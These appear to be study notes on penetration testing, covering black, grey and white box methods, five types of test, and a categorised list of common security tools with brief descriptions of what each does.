Penetration testing:

It is commonly known as a pen test or pen test in ethical hacking. It is a form of cyberattack that is
done to check what is the situation of the security of a system

Types of Penetration Testing Methodologies:

1. Black Box penetration testing

2. Grey Box Penetration testing
3. White Box Penetration testing

Black Box Penetration Testing:-

 In this method, the attacker does not know the target as it exactly simulates an actual cyber
attack where an actual black hat hacker attacks.
 This testing takes time as the attacker does not know the system so he gathers them.
 This method is used to find existing vulnerabilities in the system and to simulate how far a
hacker can go into the system without any info about the system.

Grey Box Penetration Testing:-

In this method, the attacker is provided with a bit of information about the target like network
configurations, subnets, or a specific IP to test, Attacker has a basic idea of how the machine is to
which he/she is going to perform an attack, they may also be provided with low-level login
credentials or access to the system which helps them in having a clear approach, This saves time of
Reconnaissance the target.

White Box Penetration Testing:-

We can say that in this testing method attackers have developer-level knowledge about the system
which also includes an assessment of source code, Ethical hackers have full access to the system
more in-depth than black box testing. It is used to discover potential threats to the system due to
bad programming, misconfigurations, or lack of defensive measures.

Qn1. Penetration testing, or pen testing, involves simulating attacks on a system to identify
vulnerabilities before malicious actors can exploit them. Different penetration tests focus on various
aspects of an organization's IT infrastructure. Here are the main types you mentioned:

1. external testing
2. web application testing
3. internal testing
4. SSID or wireless testing
5. mobile application testing

1. External Testing
External penetration testing targets the organization's external-facing assets, such as websites,
servers, and network infrastructure that are accessible from the internet. The goal is to identify and
exploit vulnerabilities that could be used by an attacker to gain unauthorized access or disrupt
services.
Example: A penetration tester might target a company's public web server to identify vulnerabilities
such as open ports, misconfigurations, or outdated software. Using tools like Nmap and Metasploit,
they can attempt to exploit these vulnerabilities to gain unauthorized access or disrupt services

Tools Used: Nmap, Metasploit, Nessus

Nmap:

 Functionality: Nmap (Network Mapper) is a powerful network scanning tool used to

discover hosts, services, and open ports on a network. It helps in creating a network map
and identifying potential vulnerabilities.

2. Web Application Testing

Overview: Web application penetration testing assesses the security of web applications by
identifying and exploiting vulnerabilities like SQL injection, cross-site scripting (XSS), cross-site
request forgery (CSRF), and insecure direct object references. This type of testing helps ensure that
web applications are secure against common web-based attacks.

Example: A tester might use OWASP ZAP or Burp Suite to scan a web application for vulnerabilities.
They could find an XSS vulnerability that allows them to inject malicious scripts into the application,
potentially stealing user data or hijacking sessions.Tools Used: OWASP ZAP, Burp Suite, Acunetix

Tools Used: OWASP ZAP, Burp Suite, Acunetix

OWASP ZAP (Zed Attack Proxy)

 Functionality: OWASP ZAP is an open-source web application security scanner. It helps in

finding security vulnerabilities in web applications through automated scanning and manual
testing tools.

Burp Suite

 Functionality: Burp Suite is a comprehensive suite of tools for web application

security testing. It includes features like a web vulnerability scanner, an intercepting
proxy, a repeater, and an intruder for automated attacks.

3. Internal Testing
Overview: Internal penetration testing simulates an attack from within the organization's network.
This could represent an insider threat or an attacker who has already breached the perimeter
defenses. The focus is on identifying vulnerabilities within the internal network, such as weak
passwords, unpatched systems, and misconfigurations.
Example: An internal penetration tester might use tools like Nessus and Wireshark to scan the
internal network for vulnerabilities. They could exploit a weak password on a database server to gain
access to sensitive information.

Tools Used: Nessus, Wireshark, BloodHound

Wireshark

 Functionality: Wireshark is a network protocol analyzer that captures and displays network
traffic in real-time. It allows detailed inspection of data packets to diagnose network issues
and detect malicious activity.

4. SSID or Wireless Testing

Overview: Wireless penetration testing evaluates the security of an organization's wireless networks
(Wi-Fi). This includes assessing the encryption methods used, the strength of passwords, and the
potential for unauthorized access points. The aim is to ensure that wireless networks are secure
against eavesdropping, unauthorized access, and other wireless-specific attacks.

Example: A penetration tester might use Aircrack-ng to capture and analyze wireless traffic,
attempting to crack the Wi-Fi password. They could also use tools like Kismet to identify rogue
access points and assess the security of legitimate ones.

Tools Used: Aircrack-ng, Kismet, Wireshark

Aircrack-ng

 Functionality: Aircrack-ng is a suite of tools for assessing Wi-Fi network security. It includes
tools for monitoring, attacking, testing, and cracking Wi-Fi passwords.

5. Mobile Application Testing

Overview: Mobile application penetration testing focuses on identifying vulnerabilities in mobile
apps, which can include issues like insecure data storage, weak server-side controls, improper
session handling, and flaws in the authentication process. Testing is done on both the mobile app
and the backend services it interacts with.

Example: A tester might use tools like MobSF and Drozer to analyze a mobile application for
vulnerabilities. They could discover that sensitive data is being stored insecurely on the device,
making it accessible to malicious apps or users.
Tools Used: MobSF, Drozer, Burp Suite Mobile Assistant

MobSF (Mobile Security Framework)

 Functionality: MobSF is an automated, all-in-one mobile application security testing

framework that performs static and dynamic analysis of Android, iOS, and Windows apps

Qn3. Penetration tools:

Penetration testing involves a wide range of tools that help testers identify, exploit, and
document vulnerabilities in systems, networks, and applications. Here’s a detailed look at
some of the most commonly used penetration testing tools categorized by their primary
function:

Network Scanning and Discovery

1. Nmap
o Functionality: Network discovery, port scanning, service detection, and operating
system fingerprinting.
o Usage: Identifies live hosts, open ports, and running services on a network.

2. Nessus
o Functionality: Comprehensive vulnerability scanning.
o Usage: Detects security vulnerabilities, configuration issues, and missing patches.

Exploitation Frameworks

1. Metasploit
o Functionality: Exploit development and execution, payload generation, and post-
exploitation tools.
o Usage: Simulates attacks by exploiting vulnerabilities to gain unauthorized access.

2. Canvas
o Functionality: Commercial exploitation framework with a library of exploits.
o Usage: Similar to Metasploit but with different exploit modules and commercial
support.

Web Application Testing

1. OWASP ZAP (Zed Attack Proxy)

o Functionality: Automated and manual web application security testing.
o Usage: Identifies vulnerabilities like SQL injection, XSS, and more through active and
passive scanning.

2. Burp Suite
o Functionality: Comprehensive suite for web application security testing, including a
proxy, scanner, intruder, repeater, and more.
o Usage: Intercepts and modifies HTTP requests and responses, scans for
vulnerabilities, and automates attacks.
 3. Acunetix
o Functionality: Automated web vulnerability scanning.
o Usage: Detects web application vulnerabilities like SQL injection, XSS, and other
common issues.

Password Cracking

1. John the Ripper

o Functionality: Password cracking tool.
o Usage: Cracks passwords through brute force, dictionary, and hybrid attacks.

2. Hashcat
o Functionality: Advanced password recovery tool using GPUs.
o Usage: Cracks hashes using various attack methods and highly optimized algorithms.

Wireless Network Testing

1. Aircrack-ng
o Functionality: Suite of tools for wireless network auditing.
o Usage: Captures and analyzes wireless traffic, cracks WEP/WPA/WPA2 keys.

2. Kismet
o Functionality: Wireless network detector, sniffer, and intrusion detection system.
o Usage: Detects wireless networks, captures packets, and identifies unauthorized
access points.

Proxy Tools

1. Burp Suite
o Functionality: (As described above)
o Usage: Functions as a proxy to intercept and analyze web traffic.

2. Fiddler
o Functionality: Web debugging proxy.
o Usage: Captures and inspects HTTP(S) traffic, allows for modification of requests and
responses.

OSINT (Open Source Intelligence) Tools

1. Maltego
o Functionality: Data mining and visualization tool.
o Usage: Maps relationships between people, companies, domains, and other entities
using public data.

2. Recon-ng
o Functionality: Web reconnaissance framework written in Python.
o Usage: Automates OSINT gathering tasks and integrates various information
sources.
Mobile Application Testing

1. MobSF (Mobile Security Framework)

o Functionality: Automated static and dynamic analysis for Android, iOS, and
Windows apps.
o Usage: Identifies security issues in mobile applications.

2. Drozer
o Functionality: Security audit and attack framework for Android apps.
o Usage: Interacts with components of Android applications to find and exploit
vulnerabilities.

Packet Sniffing and Network Analysis

1. Wireshark
o Functionality: Network protocol analyzer.
o Usage: Captures and inspects network traffic in real-time to diagnose network issues
and detect malicious activity.

Social Engineering Tools

1. Social-Engineer Toolkit (SET)

o Functionality: Framework for social engineering attacks.
o Usage: Simulates various social engineering attacks like phishing, credential
harvesting, and more.

Post-Exploitation Tools

1. Mimikatz
o Functionality: Extracts plaintext passwords, hash, PIN code, and Kerberos tickets
from memory.
o Usage: Used for post-exploitation activities to escalate privileges and maintain
access.

2. Empire
o Functionality: Post-exploitation framework for Windows, Linux, and macOS.
o Usage: Automates the post-exploitation phase with modules for credential dumping,
lateral movement, and more.